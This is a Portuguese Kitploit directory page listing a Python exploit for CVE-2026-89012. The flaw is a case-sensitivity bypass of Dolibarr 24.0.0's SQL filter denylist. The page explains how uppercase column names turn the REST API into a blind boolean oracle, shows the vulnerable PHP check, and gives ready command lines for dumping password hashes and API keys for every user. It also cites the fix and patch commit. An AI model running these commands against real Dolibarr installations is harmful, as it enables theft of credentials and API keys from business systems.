Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-89012 — Exploit em Python para CVE-2026-89012, um bypass da denylist de filtros SQL do Dolibarr que usa um oráculo blind-boolean para extrair hashes de senha e chaves de API através da REST API. | Kitploit
Ferramentas/GitHubGitHub/faceless0x7/cve-2026-89012
Quebra de SenhasAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosColeta de InformaçõesSegurança WebTestes de PenetraçãoSegurança de API
GitHubfaceless0x7/cve-2026-89012

CVE-2026-89012

Exploit em Python para CVE-2026-89012, um bypass da denylist de filtros SQL do Dolibarr que usa um oráculo blind-boolean para extrair hashes de senha e chaves de API através da REST API.

1há 16h 7mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

CVE-2026-89012 — Bypass da denylist de filtro SQL do Dolibarr

Exploit para CVE-2026-89012: a denylist de campos proibidos em forgeSQLFromUniversalSearchCriteria() (introduzida com a correção do CVE-2026-71510) usa um in_array() sensível a maiúsculas/minúsculas enquanto o conjunto de caracteres do operando permite A-Z. Como a resolução de colunas SQL não diferencia maiúsculas de minúsculas, um usuário autenticado da API pode consultar t.PASS_CRYPTED em vez de t.pass_crypted e contornar a denylist. Predicados LIKE com prefixo transformam sqlfilters em um oráculo booleano cego que recupera hashes de senha caractere por caractere.

Registro: https://www.cve.org/CVERecord?id=CVE-2026-89012

AfetadoDolibarr 24.0.0
Corrigido24.0.1
Pré-requisitostoken de API válido com users->lire
Impactodivulgação de pass_crypted, api_key, pass, pass_temp, openid

Causa raiz

root@kitploit:~
// htdocs/core/lib/functions.lib.php, 24.0.0 line 16306
$operandwithoutprefix = preg_replace('/^[a-z0-9_]+\./i', '', $operand);
if (in_array($operandwithoutprefix, $newforbiddenfields)) {  // case-sensitive
    return '1=1';
}

Uso

root@kitploit:~
# detection (safe, 3 requests)
python3 CVE-2026-89012.py https://erp.local/api/index.php/users --apikey KEY check

# list readable users
python3 CVE-2026-89012.py https://erp.local/api/index.php/users --apikey KEY users

# extract pass_crypted for every user (threaded oracle)
python3 CVE-2026-89012.py https://erp.local/api/index.php/users --apikey KEY dump

# single target / other protected column
python3 CVE-2026-89012.py https://erp.local/api/index.php/users --apikey KEY dump --login admin
python3 CVE-2026-89012.py https://erp.local/api/index.php/users --apikey KEY dump --column API_KEY --charset hex

Somente biblioteca padrão (Python 3.8+). Suporta --proxy, --insecure, --timeout.

Nota: sob uma collation que não diferencia maiúsculas de minúsculas (o padrão), o valor bcrypt é recuperado exatamente até a diferença de maiúsculas/minúsculas dos caracteres; colunas de texto simples (llx_adherent.pass via /api/index.php/members, pass_temp) são recuperadas byte a byte.

demo

Referências

  • Registro CVE: https://www.cve.org/CVERecord?id=CVE-2026-89012
  • Versão corrigida: https://github.com/Dolibarr/dolibarr/releases/tag/24.0.1
  • Commit do patch: https://github.com/Dolibarr/dolibarr/commit/7a04d9c970e45e15d29c91e6f5a34a262c6c51c8

Aviso legal

Apenas para testes e pesquisas autorizados. Use somente contra sistemas que você possui ou para os quais tem permissão explícita de teste.

Baixar ferramenta